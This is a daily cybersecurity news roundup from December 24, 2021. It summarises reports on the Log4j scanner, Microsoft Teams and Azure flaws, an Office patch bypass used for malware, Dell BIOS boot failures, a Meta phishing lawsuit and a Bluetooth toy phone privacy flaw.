Cyber Security Headlines – December 24, 2021

CISA releases free scanner to spot Log4j exposure

CISA posted the Log4j Scanner to GitHub yesterday. It claimed it’s a “project derived from other members of the open-source community” and designed to help find vulnerable web services impacted by the two flaws in the popular logging tool. CISA said the scanning tool would only help security teams “look for a limited set of currently known vulnerabilities in assets owned by their organization.” It warned that there may be “as yet unknown” ways for threat actors to leverage the vulnerabilities and said it is continuing to monitor community chatter to ensure its advice is current.

(InfoSecurity)

Researchers disclose unpatched vulnerabilities in Microsoft Teams software

Microsoft said it won’t be fixing, or pushing patches to a later date, for three of the four security flaws uncovered in its Teams business communication platform earlier this March. The disclosure comes from Berlin-based cybersecurity firm Positive Security, which found that the implementation of the link preview feature was susceptible to a number of issues that could “allow accessing internal Microsoft services, spoofing the link preview, and, for Android users, leaking their IP address, and imposing Denial of Service on their Teams app/channels.” Of the four vulnerabilities, Microsoft is said to have addressed only the IP address leakage from Android devices. A fix for the denial-of-service (DoS) flaw will be considered in a future version of the product. 

(The Hacker News)

Microsoft Office patch bypassed for malware distribution in apparent ‘dry run’

Cybercriminals have found a way to bypass the patch for a recent Microsoft Office vulnerability and leveraged it to briefly distribute Formbook malware, according to Sophos. Tracked as CVE-2021-40444, the security defect can be exploited to achieve remote code execution on vulnerable systems. Publicly disclosed on September 7, after attacks exploiting it were identified, the security error was addressed with the September 2021 Patch Tuesday updates. Proof-of-concept code targeting the bug was also published and exploitation activity intensified. The patch that Microsoft provided was meant to prevent the execution of code to download a Microsoft Cabinet (CAB) archive containing a malicious executable. However, it appears that attackers found a way to bypass the patch by incorporating a Word document in a specially crafted RAR archive. Sophos says the attackers distributed the archives as part of a spam email campaign that lasted for roughly 36 hours – on October 24 and 25 – before completely disappearing, which would suggest the attack was only a “dry run” experiment.

(Security Week)

New Dell BIOS updates cause laptops and desktops not to boot

Recently released Dell BIOS updates are reportedly causing serious boot problems on multiple laptops and desktop models including Latitude laptop models (5320 and 5520), as well as Dell Inspiron 5680 and Alienware Aurora R8 desktops. Customer reports shared on social media warn that the latest BIOS version (version 1.14.3 for Latitude laptops, 2.8.0 for Inspiron, and 1.0.18 for Aurora R8) will cause booting issues including going straight to a blue screen and shutting down. Until Dell releases an update to address the bugs leading to boot, experts recommend downgrading to a previous firmware version if possible.

(Bleeping Computer)

Thanks to our episode sponsor, Lookout

Is 2022 the beginning of the end for on-prem security? Two years after remote work became the norm, we’re at an inflection point for both threats and security solutions. Just as you wouldn’t bring a sword to a gunfight, organizations need to take advantage of integrated cloud solutions to tackle emerging challenges. Check out Lookout’s 2022 predictions at lookout.com/predictions.

Why CISOs shouldn’t report to CIOs

An opinion piece written by Eric Jeffery, Senior Solutions Architect at IBM, and posted at Security intelligence.com Suggests that CISOs should no longer report to CIOS but instead should have their own seat at the executive table. He writes, “we are at a crossroads today where we need to move security out from under IT and treat it as a business risk rather than a technical problem.” According to the IBM Cost of a Data Breach study, it takes an average of 287 days to identify and contain a data breach. This number illustrates how vulnerable businesses are. He adds, inherent tension between CISOs and others that report to the CIO frequently occurs due to the trade-off between security and efficiency, which impacts business units throughout an enterprise. The full article is available at Security intelligence.com/posts.

(Security Intelligence)

4-year-old bug in Azure app service exposed hundreds of source code repositories

A security flaw has been unearthed in Microsoft’s Azure App Service that resulted in the exposure of source code of customer applications written in Java, Node, PHP, Python, and Ruby for at least four years since September 2017. The vulnerability, codenamed “NotLegit,” was reported to the tech giant by Wiz researchers on October 7, 2021, following which mitigations have been undertaken to fix the information disclosure bug in November. Microsoft said a “limited subset of customers” are at risk, adding “Customers who deployed code to App Service Linux via Local Git after files were already created in the application were the only impacted customers.”

(The Hacker News)

Meta (Facebook) sues operators of 39,000 phishing sites

Meta, the parent company for Facebook, Instagram, and WhatsApp, has filed a lawsuit in a California court against the operators of more than 39,000 phishing sites that have been hosted through the Ngrok service. The company is seeking to obtain a court injunction and damages of at least $500,000 from the operators of these sites, even before they are identified, according to court documents obtained by The Record. The lawsuit alleged that the group created phishing sites on their local systems and then used Ngrok, a localhost-to-internet relay service that allows developers to expose their local sites on the ngrok.io domain. The group then spread links to these ngrok.io domains to victims and collected their account credentials. 

(The Record)

Fisher Price’s Bluetooth reboot of pre-school play phone has privacy flaw

The Fisher Price Bluetooth, a replica of the brightly colored plastic phone you likely played with as a child, has been found to instead threaten the very adult prospect of being surveilled in your home. The phone, the Fisher Price Chatter Special Edition, that we first reported on in September, adds Bluetooth and a speaker to the smiling, brightly colored, wheeled, rotary dial phone. It connects to a smartphone and can be used to make real calls. Unfortunately, according to PenTest Partners, the Chatter uses Bluetooth classic without secure pairing, which means it agrees to any pairing request. Anyone within range could therefore hook up a Bluetooth device, and tune in to whatever is said within range of the Chatter’s microphone.

(The Register)